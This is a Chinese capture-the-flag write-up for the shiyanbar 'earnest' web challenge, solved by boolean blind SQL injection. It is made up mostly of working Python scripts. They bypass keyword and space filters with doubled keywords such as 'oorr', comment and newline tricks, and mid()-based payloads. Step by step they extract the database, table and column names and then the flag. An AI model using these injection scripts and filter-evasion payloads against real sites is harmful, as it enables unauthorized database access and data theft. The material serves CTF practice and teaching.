实验吧web-难-认真一点!(布尔盲注之mid(),py脚本)

也可用bp进行爆破,这里用py脚本。

打看网页输入1,显示You are in,输入2,显示You are not in,是个布尔注入。

然后看看过滤了什么。

sql注入没有过滤:--+、or

sql注入过滤:union select、and、order by、空格

虽然or没有被当做sql注入处理,但是构造id=1'/**/or/**/1'='1--+时仍然是返回,You are not in。
所以应该是,or仍然被过滤,只是没有被当做sql注入,于是利用oorr来绕过。

下面给出爆破脚本:

1.暴库长

import requests

s='You are in'
url='http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(30):
	key={'id':"0'oorr(length(database())=%s)oorr'0"%i}
	r=requests.post(url,data=key).text
	print(i)
	if s in r:
		print(i)
		break

结果是18.

2.爆库名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
p='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
database=''
for i in range(19):
	for j in p:
		key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
		r=requests.post(url,data=key).text
		
		if s in r:
			database+=j
			print(database)
			break
print('answer is:')
print(database)

结果是:ctf_sql_bool_blind

3.爆表长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
s='You are in'
i=1
while True:
	pay="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
	pay=pay.replace(' ',chr(0x0a))
	key={'id':pay}
	r=requests.post(url,data=key).text
	print(key)
	if s in r:
		print(i)
		break
	i+=1

结果是:11

4.爆表名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
tables=''
for i in range(12):
	for j in guess:
		flag="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
		#flag="0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
		flag=flag.replace(' ',chr(0x0a))
		pay={'id':flag}
		r=requests.post(url,data=pay).text
		print(pay)

		if s in r:
			tables+=j
			print(j)
			break

print (tables)

结果是:fiag@users

显然我们需要的是fiag。

5.爆列长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'

i=1
while True:
	flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
	flag=flag.replace(' ',chr(0x0a))
	pay={'id':flag}
	r=requests.post(url,data=pay).text
	print(pay)
	if s in r:
		print(i)
		break
	i+=1

结果是:6

6.爆列名

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
columns=''

for i in range(1,7):
	for j in guess:
		flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
		#flag="0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
		flag=flag.replace(' ',chr(0x0a))
		pay={'id':flag}
		r=requests.post(url,data=pay).text
		print(pay)
		if s in r:
			columns+=j
			print(j)
			break
print(columns)

结果是:fl$4g

7.爆字段长

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'

i=1
while True:
	pay={'id':"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i}
	r=requests.post(url,data=pay).text
	print(pay)
	if s in r:
		print(i)
		break
	i+=1

结果是13

8.爆字段

import requests

url='http://ctf5.shiyanbar.com/web/earnest/index.php'
guess='qwertyuiopasdfghjklmnbvcxz1234567890_~[]{}/!@#$%^&*()'
s='You are in'
dump=''

for i in range(1,15):
	for j in guess:
		pay={'id':"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)}
		r=requests.post(url,data=pay).text
		print(pay)
		if s in r:
			dump+=j
			print(j)
			break
print(dump)

结果竟然是flag{haha~you。

蒙圈,看了大佬的wp才知道,原来第十四位是‘ ’,不过估计后面的内容也不长,于是改个数字继续跑就跑出结果了。

你可能感兴趣的:(sql注入,实验吧web)